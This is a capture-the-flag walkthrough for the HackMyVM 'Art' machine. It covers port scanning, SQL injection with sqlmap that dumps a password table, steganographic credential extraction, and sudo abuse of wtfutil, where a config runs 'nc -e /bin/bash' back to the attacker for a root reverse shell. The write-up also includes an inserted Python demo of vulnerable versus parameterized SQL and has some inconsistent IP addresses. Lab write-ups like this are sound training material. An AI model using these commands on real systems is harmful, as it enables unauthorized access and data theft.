NOTES ABOUT Art
[ 2022-09-30 ] [ HackMyVM / Art ] Status: Rooted
Skills: Port Scanning, Fuzzing, SQLi, Steganography, SSH, Sudo
Tools: nmap, wfuzz, sqlmap, steghide, nc
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.11
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 45:42:0f:13:cc:8e:49:dd:ec:f5:bb:0f:58:f4:ef:47 (RSA)
| 256 12:2f:a3:63:c2:73:99:e3:f8:67:57:ab:29:52:aa:06 (ECDSA)
|_ 256 f8:79:7a:b1:a8:7e:e9:97:25:c3:40:4a:0c:2f:5e:69 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
GETTING IN
DYNAMIC TAG PARAM DETECTION:
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -r 5 --hw 17 http://10.0.2.12/index.php?FUZZ=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.12/index.php?FUZZ=FUZZ
Total requests: 211
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000097: 200 4 L 12 W 70 Ch "tag - tag"
NO LFI SO...
$ sqlmap -u "http://10.0.2.12/index.php?tag=" --dbs
$ sqlmap -u "http://10.0.2.12/index.php?tag=" -D gallery --tables
$ sqlmap -u "http://10.0.2.12/index.php?tag=" -D gallery -T users --dump
$ sqlmap -u "http://10.0.2.12/index.php?tag=" -D gallery -T art --dump
+----+-----------------+--------+
| id | pass | user |
+----+-----------------+--------+
| 1 | realpazz | mina |
| 2 | mncxzKLLJDS | me |
| 3 | 987dsKLDSOIU | lula |
| 4 | BDSAOIUYEW | notme |
| 5 | dsOIUSDAOydsa | mona |
| 6 | EWQUDSAdaSDSA= | admin |
| 7 | VCXddsaEWQdsa_D | lila |
| 8 | DSAewqDSAewq | root |
+----+-----------------+--------+
+----+-----------+---------------+
| id | tag | image |
+----+-----------+---------------+
| 5 | beauty | dsa32.jpg |
+----+-----------+---------------+
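The tag parameter is injectable because it is spliced into the SQL text; index.php itself is not on this page, so the snippet below is an added, hypothetical reconstruction of that flaw next to the parameterized fix, using an in-memory SQLite stand-in for the gallery database (table and column names taken from the sqlmap dump above, the second art row is constructed):

```python
import sqlite3


def build_gallery():
    """Constructed stand-in for the `gallery` database behind index.php?tag=."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE art (id INTEGER, tag TEXT, image TEXT);
        INSERT INTO art VALUES (5, 'beauty', 'dsa32.jpg');  -- row from the dump above
        INSERT INTO art VALUES (6, 'nature', 'tree.jpg');   -- constructed extra row
    """)
    return db


def lookup_vulnerable(db, tag):
    # Hypothetical reconstruction of the flawed pattern: the GET parameter is
    # concatenated into the statement, so a quote in `tag` rewrites the query.
    sql = "SELECT image FROM art WHERE tag = '" + tag + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, tag):
    # Hardened form: the value is bound as a parameter, so it is always data
    # and can never become SQL syntax, whatever characters it contains.
    sql = "SELECT image FROM art WHERE tag = ?"
    return [row[0] for row in db.execute(sql, (tag,))]


if __name__ == "__main__":
    db = build_gallery()
    probe = "' OR '1'='1"
    print(lookup_vulnerable(db, probe))  # every image: the WHERE clause is now always true
    print(lookup_safe(db, probe))        # []: no row has that literal tag
```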
$ steghide extract -sf dsa32.jpg
Enter passphrase:
wrote extracted data to "yes.txt".
$ cat yes.txt
lion/shel0vesyou
$ ssh lion@10.0.2.12
ELEVATING PRIVILEGES
$ sudo -l
Matching Defaults entries for lion on art:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lion may run the following commands on art:
(ALL : ALL) NOPASSWD: /bin/wtfutil
https://github.com/wtfutil/wtf/blob/master/_sample_configs/small_config.yml
python3 -m http.server
$ cat c.yml
wtf:
  grid:
    columns: [20, 20]
    rows: [3, 3]
  refreshInterval: 1
  mods:
    uptime:
      type: cmdrunner
      args: ['-e','/bin/bash','10.0.2.15','443']
      cmd: "nc"
      enabled: true
      position:
        top: 0
        left: 0
        height: 1
        width: 1
      refreshInterval: 30
REVERSE SHELL LISTENER:
$ nc -lvnp 443
GETTING REVERSE ROOT SHELL
$ wget http://10.0.2.12:8000/c.yml
$ sudo -u root /bin/wtfutil --config=c.yml
$ find / -name root.txt
/var/opt/root.txt
$ ls -lah /var/opt/root.txt
-rw------- 1 root root 24 ago 3 11:17 /var/opt/root.txt
# init 0